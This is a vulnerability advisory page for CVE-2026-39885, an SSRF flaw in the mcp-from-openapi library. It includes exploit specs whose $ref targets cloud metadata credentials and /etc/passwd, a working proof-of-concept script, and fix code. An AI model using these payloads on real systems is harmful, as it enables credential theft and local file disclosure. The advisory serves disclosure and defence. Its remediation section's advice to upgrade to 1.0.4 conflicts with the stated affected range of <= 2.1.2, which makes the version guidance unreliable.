Skip to main content

Microsoft CVE-2026-39885

| EUVDEUVD-2026-20632 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-04-08 https://github.com/agentfront/frontmcp GHSA-v6ph-xcq9-qxxj
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

4
Patch released
Apr 09, 2026 - 02:30 nvd
Patch available
EUVD ID Assigned
Apr 08, 2026 - 19:31 euvd
EUVD-2026-20632
Analysis Generated
Apr 08, 2026 - 19:31 vuln.today
CVE Published
Apr 08, 2026 - 19:22 nvd
HIGH 7.5

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 npm packages depend on @frontmcp/adapters (1 direct, 0 indirect)
  • 10 npm packages depend on @frontmcp/sdk (9 direct, 1 indirect)
  • 2 npm packages depend on mcp-from-openapi (1 direct, 1 indirect)

Ecosystem-wide dependent count for version 1.0.4 and other introduced versions.

DescriptionGitHub Advisory

Summary

The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.

Affected Versions

<= 2.1.2 (latest)

CWE

CWE-918: Server-Side Request Forgery (SSRF)

Vulnerability Details

File: index.js lines 870-875

When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:

javascript
this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
  JSON.parse(JSON.stringify(this.document))
);

No options are passed to .dereference() - no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:

  • http:// and https:// URLs (internal services, cloud metadata)
  • file:// URLs (local filesystem)

This is the default behavior of json-schema-ref-parser - it resolves all $ref pointers by fetching the referenced resource.

Exploitation

Attack 1: SSRF to internal services / cloud metadata

A malicious OpenAPI spec containing:

json
{
  "openapi": "3.0.0",
  "info": { "title": "Evil API", "version": "1.0" },
  "paths": {
    "/test": {
      "get": {
        "operationId": "getTest",
        "summary": "test",
        "responses": {
          "200": {
            "description": "OK",
            "content": {
              "application/json": {
                "schema": {
                  "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
                }
              }
            }
          }
        }
      }
    }
  }
}

When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.

Attack 2: Local file read

json
{
  "$ref": "file:///etc/passwd"
}

The ref parser reads local files and includes their contents in the dereferenced output.

Proof of Concept

javascript
const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');

// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
    console.log(`SSRF HIT: ${req.method} ${req.url}`);
    res.writeHead(200, {'Content-Type': 'application/json'});
    res.end('{"type":"string"}');
});

srv.listen(9997, async () => {
    const spec = {
        openapi: '3.0.0',
        info: { title: 'Evil', version: '1.0' },
        paths: {
            '/test': {
                get: {
                    operationId: 'getTest',
                    summary: 'test',
                    responses: {
                        '200': {
                            description: 'OK',
                            content: {
                                'application/json': {
                                    schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
                                }
                            }
                        }
                    }
                }
            }
        }
    };

    const gen = new OpenAPIToolGenerator(spec, { validate: false });
    await gen.initialize();
    // Output: "SSRF HIT: GET /ssrf-proof"
    // The library fetched our attacker URL during $ref dereferencing.

    srv.close();
});

Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().

Impact

  • Cloud credential theft - $ref pointing to http://169.254.169.254/ steals AWS/GCP/Azure metadata
  • Internal network scanning - $ref values can probe internal services and ports
  • Local file read - file:// protocol reads arbitrary files from the server filesystem
  • No privileges required - attacker only needs to provide a crafted OpenAPI spec to any application using this library

Suggested Fix

Pass resolver options to dereference() that restrict which protocols and hosts are allowed:

javascript
this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: {
      file: false,        // Disable file:// protocol
      http: {
        // Only allow same-origin or explicitly allowed hosts
        headers: this.options.headers,
        timeout: this.options.timeout,
      }
    }
  }
);

Or disable all external resolution and require all schemas to be inline:

javascript
this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: { file: false, http: false, https: false }
  }
);

AnalysisAI

Server-Side Request Forgery in mcp-from-openapi (<= 2.1.2) allows unauthenticated remote attackers to retrieve cloud metadata credentials, scan internal networks, and read local files by providing malicious OpenAPI specifications containing $ref pointers to internal URLs (http://169.254.169.254/) or file:// paths. The library's json-schema-ref-parser fetches referenced resources without protocol or hostname restrictions during OpenAPI document initialization, enabling AWS/GCP/Azure credential theft and arbitrary file disclosure with no privileges required beyond spec submission.

Technical ContextAI

Root cause in index.js lines 870-875: OpenAPIToolGenerator.initialize() calls json-schema-ref-parser.dereference() with no resolver configuration options, accepting default behavior that fetches all http://, https://, and file:// URIs in $ref values. CWE-918 SSRF stems from absence of protocol allowlists or hostname validation during schema reference resolution.

RemediationAI

Vendor-released patch: upgrade to mcp-from-openapi version 1.0.4 or later per https://github.com/agentfront/frontmcp/releases/tag/v1.0.4. Patched version configures json-schema-ref-parser with resolver restrictions disabling file:// protocol and enforcing hostname validation for http/https $ref targets. Immediate workaround: validate and sanitize all OpenAPI specifications before processing, rejecting specs containing $ref values with non-HTTPS schemes or IP addresses. Review advisory details at https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj for mitigation guidance. No public exploit identified at time of analysis, though detailed proof-of-concept exists in vulnerability disclosure demonstrating SSRF to localhost endpoints.

Share

CVE-2026-39885 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy